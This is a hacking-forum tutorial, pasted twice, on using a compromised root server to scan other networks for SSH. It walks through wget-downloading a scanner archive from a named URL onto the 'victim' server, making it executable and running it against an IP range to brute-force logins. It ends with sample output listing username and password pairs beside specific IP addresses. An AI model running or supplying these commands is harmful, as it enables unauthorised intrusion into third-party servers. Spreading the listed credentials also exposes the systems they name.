Well i have watched so many times someone rooted a server and mass-deface it And i was like WTF? Why dont they use it for something ealse....Till today like i promised a Tutorial what to do after you got Root on the server
So lets start What To Do Next?
-Well after geting root privileges you can do what ever you wonna with the server installing/removing/updating/adding users/browe everything.
But am not going to speak about anything above this...Am going to show you how to use the Root in the best way possible
-I dont know if anyone of you have hearded about SSH(Secure Shell Hosting) this is on port 22 its connecting on the routher and sometimes directly on the PC.This is used for hidding you ass Am using it when am doing something really stupid .Today we are going to Scan for SSH(SecureShellHosting).
What We Need:
*Root Priv. On Some Server
*Putty
*Scanner
*Patience
1st _...Putty...._
Download Link For Putty:
Download putty and connect to your hacked Server
2nd. ~Scanner~
After we connect to our Victims PC(Server) we need to get a scanner.
Here is one
[code]http://www.freewebs.com/gbl-net/cristina.tgz/[code]
Now to download it from there we use wGet Command
When the download finish we need to extrat this scanner from his file and for that we use
in this case:
Than we need to enter the folder where are the files from the scanner :
This case:
And we give all files 777 permisions so they can be executed easly from anyuser not only root
After we done all this we can start scanning now you can use from proxys ips am going to use
but we do not enter the whole IP we only enter the first 2 numbers
And now we start scaning by executing this:
Now we wait till the scaning ends After the scan ends its brute-forcing time its checking for user and password and we still gonna to wait
After The Scan and BruteForcing ends you can open the vuln.txt and see something like this:
*Note: Non Of This Works..This is just to show you how it will looks!
Thank You For Reading This Tutorial If You Like It Press Thanks And Feel Free To Comment!
Tutorial Writen By AlphaSky
So lets start What To Do Next?
-Well after geting root privileges you can do what ever you wonna with the server installing/removing/updating/adding users/browe everything.
But am not going to speak about anything above this...Am going to show you how to use the Root in the best way possible
-I dont know if anyone of you have hearded about SSH(Secure Shell Hosting) this is on port 22 its connecting on the routher and sometimes directly on the PC.This is used for hidding you ass Am using it when am doing something really stupid .Today we are going to Scan for SSH(SecureShellHosting).
What We Need:
*Root Priv. On Some Server
*Putty
*Scanner
*Patience
1st _...Putty...._
Download Link For Putty:
Code:
http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
2nd. ~Scanner~
After we connect to our Victims PC(Server) we need to get a scanner.
Here is one
[code]http://www.freewebs.com/gbl-net/cristina.tgz/[code]
Now to download it from there we use wGet Command
Code:
wget http://www.freewebs.com/gbl-net/cristina.tgz
When the download finish we need to extrat this scanner from his file and for that we use
Code:
tar -zxvf scanner_name.tgz
Code:
tar -zxvf cristina.tgz
Than we need to enter the folder where are the files from the scanner :
Code:
cd Scanner_Folder_Name
Code:
cd Cristina
And we give all files 777 permisions so they can be executed easly from anyuser not only root
Code:
chmod +x *
After we done all this we can start scanning now you can use from proxys ips am going to use
Code:
189.254.237.190
Code:
189.254
Code:
./start 189.254
Now we wait till the scaning ends After the scan ends its brute-forcing time its checking for user and password and we still gonna to wait
After The Scan and BruteForcing ends you can open the vuln.txt and see something like this:
Code:
cat vuln.txt
Code:
test:test 68.15.219.98 oscar:oscar 68.16.249.206 user:user 68.19.179.99 test123:123456 66.113.138.78 user:1234 67.19.130.75 guest:guest1 67.53.138.125 root:admin 67.53.145.51 root:pa55word 67.55.5.81 oracle:oracle 67.69.131.94 oracle:oracle 67.69.131.30 user:user 67.78.114.180 root:abc123 67.78.170.186 tomcat5:tomcat5 67.87.115.176 admin:sysmail 67.90.99.71 root:beach 67.90.99.71 stud:stud 67.90.99.71 trash:trash 67.90.99.71 aaron:aaron123 67.90.99.71 gt05:gt05 67.90.99.71 william:william 67.90.99.71 stephanie:stephanie 67.90.99.71 root:hamster 67.90.99.71 root:welcome1 67.90.99.71 root:admin 67.90.36.86 root:admin 67.90.36.85 diane:diane 67.98.52.24 admin:sysmail 189.254.204.116 root:beach 189.254.204.116 stud:stud 189.254.204.116 trash:trash 189.254.204.116
Tutorial Writen By AlphaSky
Categories:
rooting